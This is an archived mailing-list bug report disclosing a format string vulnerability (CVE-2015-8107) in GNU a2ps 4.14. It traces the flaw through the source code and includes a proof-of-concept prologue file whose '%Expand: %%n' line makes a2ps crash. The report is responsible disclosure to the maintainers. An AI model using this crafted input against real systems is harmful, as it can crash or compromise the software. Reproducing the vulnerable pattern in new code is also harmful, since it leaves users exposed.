bug-a2ps
[Top][All Lists]
Advanced
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Format string bug report in a2ps

From: 김종권
Subject: Format string bug report in a2ps
Date: Thu, 12 Nov 2015 14:40:31 +0900
User-agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:38.0) Gecko/20100101 Thunderbird/38.3.0
Dear Gnu-a2ps team,

I am writing this to report a format string vulnerability in a2ps. (4.14, which is the latest version)
Also I already have been assigned a CVE identifier from MITRE "CVE-2015-8107", so I want to make public this vulnerability.

- Target Platform
  Linux
- Target Version
  4.14 (Latest Version)

- Vulnerability description
When user runs a2ps with malicious crafted pro(a2ps prologue) file, an attacker can execute arbitrary code.
The function output_file processes the %Expand command in pro file.
The variable `expansion' in the function output_file may hold a malicious input string, which can be used as a format argument of vsprintf.

-- Step 1. (ouput.c 524 line)

524     expansion = ((char *)
                         expand_user_string (job, FIRST_FILE (job),
                               (const uchar *) "Expand: requirement",
                               (const uchar *) token));

For instance, the variable expansion will point to the string “%n” when a text line "%Expand: %%\n” exists in an input pro file.

-- Step 2. (output.c 525 line)

525    output (dest, expansion);

output() is called in line 525, and the argument `expansion' is used as a format string, which can be malicious, as we described in step 1.

-- Step 3. (output.c 873 line)
182    void output (struct output * out, const char *format, ...){
     ...
202   ds_unsafe_cat_vsprintf (out->chunk,format, args);
     ...

The variable format, which can be malicious, can be passed to ds_unsafe_cat_vsprintf() in line 202.

-- step 4. (dstring.c 321 line)
321    void ds_unsafe_cat_vsprintf (struct dstring * ds, const char *format, va_list args){
      ...
326    vsprintf (ds->content + ds->len, format, args);
      ...

The value of format, which can be malicious, is used as an argument of vsprintf in line 326, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.pro"
===================================
% -*-postscript-*-
% PostScript Prologue
%
% $Id: matrix.pro,v 1.1.1.1.2.1 2007/12/29 01:58:27 mhatta Exp $
%

%
% This file is part of a2ps.
%
% This program is free software; you can redistribute it and/or modify
% it under the terms of the GNU General Public License as published by
% the Free Software Foundation; either version 3, or (at your option)
% any later version.
%
% This program is distributed in the hope that it will be useful,
% but WITHOUT ANY WARRANTY; without even the implied warranty of
% MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
% GNU General Public License for more details.
%
% You should have received a copy of the GNU General Public License
% along with this program; see the file COPYING.  If not, write to
% the Free Software Foundation, 59 Temple Place - Suite 330,
% Boston, MA 02111-1307, USA.
%
Documentation
The layout is the same as samp(bw)samp, but alternating gray and white lines.
There are two macros defining the behavior:
samp(pro.matrix.cycle)samp defines the length of the cycle (number of white
and gray lines).  It defaults to 6.
samp(pro.matrix.gray)samp defines the number of gray lines.  Default is 3.
EndDocumentation
% -- code follows this line --
%%IncludeResource: file base.ps
%%IncludeResource: file a2ps.hdr
%%BeginResource: procset a2ps-matrix-Prolog 2.0 1

% Function T(ab), jumps to the n-th tabulation in the current line
/T {
 cw mul x0 add y0 moveto
} bind def

% Function n: move to the next line
/n { %def
 /y0 y0 bfs sub store
 % Draw a grey background
 /nline nline 1 add def
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
% @@@@@@@@@@@@@@ Malicious user input @@@@@@@@@@@@@@@
%Expand: %%n
% @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

%Expand:  nline #{pro.matrix.cycle:-6} mod #{pro.matrix.gray:-3} ge {
   gsave
     newpath
     x v get y0 currentfont /Descent get currentfontsize mul add moveto
     pw 0 rlineto
     0 bfs rlineto
     pw neg 0 rlineto
     closepath
     0.9 setgray
     fill
   grestore
 } if
 x0 y0 moveto
} bind def

% Function N: show and move to the next line
/N {
 Show
 n
} bind def

/S {
 Show
} bind def

/p {
 false UL
 false BX
%Face: Plain Courier bfs
 Show
} bind def

/sy {
 false UL
 false BX
%Face: Symbol Symbol bfs
 Show
} bind def

/k {
 false UL
 false BX
%Face: Keyword Courier-Oblique bfs
 Show
} bind def

/K {
 false UL
 false BX
%Face: Keyword_strong Courier-Bold bfs
 Show
} bind def

/c {
 false UL
 false BX
%Face: Comment Courier-Oblique bfs
 Show
} bind def

/C {
 false UL
 false BX
%Face: Comment_strong Courier-BoldOblique bfs
 Show
} bind def

/l {
 false UL
 false BX
%Face: Label Helvetica bfs
 Show
} bind def

/L {
 false UL
 false BX
%Face: Label_strong Helvetica-Bold bfs
 Show
} bind def

/str{
 false UL
 false BX
%Face: String Times-Roman bfs
 Show
} bind def

/e{
 false UL
 true BX
%Face: Error Helvetica-Bold bfs
 Show
} bind def

%%EndResource
%%BeginSetup
% The font for line numbering
/f# /Helvetica findfont bfs .6 mul scalefont def
/nline 0 def
%%EndSetup
===================================

Execute
===================================
~ $ a2ps --version
GNU a2ps 4.14
Written by Akim Demaille, Miguel Santana.

Copyright (c) 1988-1993 Miguel Santana
Copyright (c) 1995-2000 Akim Demaille, Miguel Santana
Copyright (c) 2007- Akim Demaille, Miguel Santana and Masayuki Hatta
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

~ $ a2ps --prologue=exploit test.tex -o test.ps
aborted (core dumped)
===================================

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug. Our analyzer reported an alarm in a2ps dstring.c 326 line, So we looked for a a2ps source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the absence of fatal bugs in C source. Sparrow is designed by Abstract Interpretation and the analysis is sound in design. Sparrow adopts a number of well-founded static analysis techniques[2,3] for scalability, precision, and user convenience.

References
[1]: http://ropas.snu.ac.kr/sparrow/
[2]: Selective Context-Sensitivity Guided by Impact Pre-Analysis. Hakjoo Oh, Wonchan Lee, Kihong Heo, Hongseok Yang, and Kwangkeun Yi. PLDI'14.
[3]: Design and Implementation of Sparse Global Analyses for C-like Languages. Hakjoo Oh, Kihong Heo, Wonchan Lee, Woosuk Lee, and Kwangkeun Yi. PLDI'12

Sincerely, Woosuk Lee & Jong-Gwon Kim

-----------------------------
Woosuk Lee
Ph.D. candidate
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) address@hidden
-----------------------------
-----------------------------
Jong-Gwon Kim
Graduate student
ROPAS lab. (http://ropas.snu.ac.kr/)
ROSAEC center (http://rosaec.snu.ac.kr/)
Seoul National University
(tel) +82-2-880-1865
(email) address@hidden
-----------------------------
reply via email to
[Prev in Thread] Current Thread [Next in Thread]